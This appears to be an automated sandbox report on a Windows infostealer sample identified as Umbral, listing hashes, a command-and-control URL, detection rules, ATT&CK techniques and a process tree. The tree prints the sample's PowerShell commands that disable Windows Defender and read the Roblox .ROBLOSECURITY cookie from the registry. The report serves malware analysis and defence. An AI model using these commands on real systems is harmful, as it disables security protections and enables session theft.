Analysis
-
max time kernel
104s -
max time network
118s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
09-09-2024 21:52
Behavioral task
behavioral1
Sample
4bb8a2bcc007cc041fe3c03c25453920N.exe
Resource
win7-20240729-en
General
-
Target
4bb8a2bcc007cc041fe3c03c25453920N.exe
-
Size
3.5MB
-
MD5
4bb8a2bcc007cc041fe3c03c25453920
-
SHA1
e922394a6f90243985b305efb9e4caed04483d40
-
SHA256
9b90f637ef1988d0b812882cc1455f1ca87b8eef2017d92ec438734b02eebe36
-
SHA512
40cc3a02511bd4b899824aeb70867218220f7797e100daf625b364f899ec3c58d8c129fe0b17c445683e0968beb5abc25262707fa074f9ef85b26da31cb7cddd
-
SSDEEP
49152:k9bxPRDP0fHuNSeZUZzWHehOQ1750lGurq4bx67oICjhTLCUA/bIHvWdW9dX8dvz:m5Rjb1Zc/hOQkvq407ozFmAeW9Wvz
Malware Config
Extracted
umbral
https://os1.olympus-entertainment.com
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral2/memory/2904-8-0x0000000000400000-0x0000000000D50000-memory.dmp family_umbral behavioral2/memory/2904-9-0x0000000000400000-0x0000000000D50000-memory.dmp family_umbral behavioral2/memory/2904-150-0x0000000000400000-0x0000000000D50000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4bb8a2bcc007cc041fe3c03c25453920N.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2392 powershell.exe 536 powershell.exe 3712 powershell.exe 2944 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts 4bb8a2bcc007cc041fe3c03c25453920N.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4bb8a2bcc007cc041fe3c03c25453920N.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4bb8a2bcc007cc041fe3c03c25453920N.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/2904-8-0x0000000000400000-0x0000000000D50000-memory.dmp themida behavioral2/memory/2904-9-0x0000000000400000-0x0000000000D50000-memory.dmp themida behavioral2/memory/2904-150-0x0000000000400000-0x0000000000D50000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4bb8a2bcc007cc041fe3c03c25453920N.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4bb8a2bcc007cc041fe3c03c25453920N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3764 wmic.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 2392 powershell.exe 2392 powershell.exe 2944 powershell.exe 2944 powershell.exe 536 powershell.exe 536 powershell.exe 3212 powershell.exe 3212 powershell.exe 3712 powershell.exe 3712 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe Token: SeDebugPrivilege 2392 powershell.exe Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 536 powershell.exe Token: SeDebugPrivilege 3212 powershell.exe Token: SeIncreaseQuotaPrivilege 3512 wmic.exe Token: SeSecurityPrivilege 3512 wmic.exe Token: SeTakeOwnershipPrivilege 3512 wmic.exe Token: SeLoadDriverPrivilege 3512 wmic.exe Token: SeSystemProfilePrivilege 3512 wmic.exe Token: SeSystemtimePrivilege 3512 wmic.exe Token: SeProfSingleProcessPrivilege 3512 wmic.exe Token: SeIncBasePriorityPrivilege 3512 wmic.exe Token: SeCreatePagefilePrivilege 3512 wmic.exe Token: SeBackupPrivilege 3512 wmic.exe Token: SeRestorePrivilege 3512 wmic.exe Token: SeShutdownPrivilege 3512 wmic.exe Token: SeDebugPrivilege 3512 wmic.exe Token: SeSystemEnvironmentPrivilege 3512 wmic.exe Token: SeRemoteShutdownPrivilege 3512 wmic.exe Token: SeUndockPrivilege 3512 wmic.exe Token: SeManageVolumePrivilege 3512 wmic.exe Token: 33 3512 wmic.exe Token: 34 3512 wmic.exe Token: 35 3512 wmic.exe Token: 36 3512 wmic.exe Token: SeIncreaseQuotaPrivilege 3512 wmic.exe Token: SeSecurityPrivilege 3512 wmic.exe Token: SeTakeOwnershipPrivilege 3512 wmic.exe Token: SeLoadDriverPrivilege 3512 wmic.exe Token: SeSystemProfilePrivilege 3512 wmic.exe Token: SeSystemtimePrivilege 3512 wmic.exe Token: SeProfSingleProcessPrivilege 3512 wmic.exe Token: SeIncBasePriorityPrivilege 3512 wmic.exe Token: SeCreatePagefilePrivilege 3512 wmic.exe Token: SeBackupPrivilege 3512 wmic.exe Token: SeRestorePrivilege 3512 wmic.exe Token: SeShutdownPrivilege 3512 wmic.exe Token: SeDebugPrivilege 3512 wmic.exe Token: SeSystemEnvironmentPrivilege 3512 wmic.exe Token: SeRemoteShutdownPrivilege 3512 wmic.exe Token: SeUndockPrivilege 3512 wmic.exe Token: SeManageVolumePrivilege 3512 wmic.exe Token: 33 3512 wmic.exe Token: 34 3512 wmic.exe Token: 35 3512 wmic.exe Token: 36 3512 wmic.exe Token: SeIncreaseQuotaPrivilege 2364 wmic.exe Token: SeSecurityPrivilege 2364 wmic.exe Token: SeTakeOwnershipPrivilege 2364 wmic.exe Token: SeLoadDriverPrivilege 2364 wmic.exe Token: SeSystemProfilePrivilege 2364 wmic.exe Token: SeSystemtimePrivilege 2364 wmic.exe Token: SeProfSingleProcessPrivilege 2364 wmic.exe Token: SeIncBasePriorityPrivilege 2364 wmic.exe Token: SeCreatePagefilePrivilege 2364 wmic.exe Token: SeBackupPrivilege 2364 wmic.exe Token: SeRestorePrivilege 2364 wmic.exe Token: SeShutdownPrivilege 2364 wmic.exe Token: SeDebugPrivilege 2364 wmic.exe Token: SeSystemEnvironmentPrivilege 2364 wmic.exe Token: SeRemoteShutdownPrivilege 2364 wmic.exe Token: SeUndockPrivilege 2364 wmic.exe Token: SeManageVolumePrivilege 2364 wmic.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2904 wrote to memory of 2392 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 89 PID 2904 wrote to memory of 2392 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 89 PID 2904 wrote to memory of 2392 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 89 PID 2904 wrote to memory of 2944 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 91 PID 2904 wrote to memory of 2944 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 91 PID 2904 wrote to memory of 2944 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 91 PID 2904 wrote to memory of 536 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 93 PID 2904 wrote to memory of 536 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 93 PID 2904 wrote to memory of 536 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 93 PID 2904 wrote to memory of 3212 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 95 PID 2904 wrote to memory of 3212 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 95 PID 2904 wrote to memory of 3212 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 95 PID 2904 wrote to memory of 3512 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 97 PID 2904 wrote to memory of 3512 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 97 PID 2904 wrote to memory of 3512 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 97 PID 2904 wrote to memory of 2364 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 100 PID 2904 wrote to memory of 2364 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 100 PID 2904 wrote to memory of 2364 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 100 PID 2904 wrote to memory of 4364 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 102 PID 2904 wrote to memory of 4364 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 102 PID 2904 wrote to memory of 4364 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 102 PID 2904 wrote to memory of 3712 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 104 PID 2904 wrote to memory of 3712 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 104 PID 2904 wrote to memory of 3712 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 104 PID 2904 wrote to memory of 3764 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 106 PID 2904 wrote to memory of 3764 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 106 PID 2904 wrote to memory of 3764 2904 4bb8a2bcc007cc041fe3c03c25453920N.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\4bb8a2bcc007cc041fe3c03c25453920N.exe"C:\Users\Admin\AppData\Local\Temp\4bb8a2bcc007cc041fe3c03c25453920N.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\4bb8a2bcc007cc041fe3c03c25453920N.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:536
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3212
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- System Location Discovery: System Language Discovery
PID:4364
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3712
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:3764
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
15KB
MD5f2b858bccbfbe367803e0d9474661b50
SHA150b6ac7628a9b06ed9412b402deede3b9982d31a
SHA2561a0737699c3de2fa948cf8b6f8fc6e3049b28676098555407447eada52caa6b8
SHA5127d47b7d25cd107a8d673268eb2a5461f18e2ed55178a735a6e4f348183ba64f48cd754bf2e3d2bf4dd412e6193e8d34e4db81e73fb33e31122b8790159c2a772
-
Filesize
18KB
MD500866e23f533a25aada0fd00116d358c
SHA1a941554ac091245bf2a429030a43b604d10d69e7
SHA2561f395f2d8f72be0e3100ad648742ca2fe3eb6070611a696dceb6846cce2fc2b4
SHA51276e061e3c76813b911c4d097faa3af898aabd835182596c24391f91af36f37176074f7db58a0a2e09850ac711c57e211e983889a2c05188e2cb56030c27b6aac
-
Filesize
17KB
MD5bf4b76055fe3c344ac993ec842ff86f2
SHA1a201a73ca0b982c107dee09fe02f8b795794cfff
SHA256b411bd5d0af45843895aca813e576307fa08168f838a7d1e49c2043beac63c82
SHA51228aa04769a0001ce0015fe6fe98f0217eb89ded71001d2c50f837cad5aba1a9e689b6d12c27a0fb2da09bdc41a1b12a97945d10466e1d854d88a20e410a99875
-
Filesize
18KB
MD593278ec23754b587aac5c01e4b7f43ad
SHA1ea8e12b77290581fb68880ea39e3c391288771c0
SHA256b444a51d32d0daefbcac5aa5d58b2ece3dfd96eab515e12e2c388dff5419ea3f
SHA512b442ef54be7b98ab6be78a4ad49dcfcbabc1dab2b55095c12ec3a32511a02fd81202424626cd79506fd215094dae41061612ee235423919c6e693f361be1b462
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82